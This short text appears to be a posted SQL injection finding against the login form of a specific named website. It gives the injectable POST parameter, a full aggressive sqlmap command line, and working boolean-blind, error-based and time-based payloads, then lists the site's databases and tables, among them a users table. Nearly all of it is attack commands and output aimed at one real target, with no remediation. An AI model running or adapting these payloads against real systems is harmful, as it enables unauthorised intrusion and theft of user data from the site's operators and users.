http://ipdb.floodcrm.net/user/login | POST: login=*&pass=x Screenshot: https://i.imgur.com/H6gEjHw.png sqlmap.py --url "http://ipdb.floodcrm.net/user/login" --batch --data "login=x*&pass=x" --keep-alive --level 5 --risk 3 --random-agent --text-only --threads 10 -v 3 --dbs --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: login=x' OR NOT 5708=5708-- ydmD&pass=x Vector: OR NOT [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: login=x' AND (SELECT 1271 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(1271=1271,1))),0x7171707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CzIv&pass=x Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: login=x' AND (SELECT 9828 FROM (SELECT(SLEEP(5)))gBtE)-- FLSH&pass=x Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) --- current user is DBA: False current database: 'ipdb' available databases [2]: [*] information_schema [*] ipdb Database: ipdb [10 tables] +-----------------+ | cms | | domains | | domains_free_id | | ipv4 | | last_ids | | parser_stats | | prcy | | pre_domains | | users | | whois | +-----------------+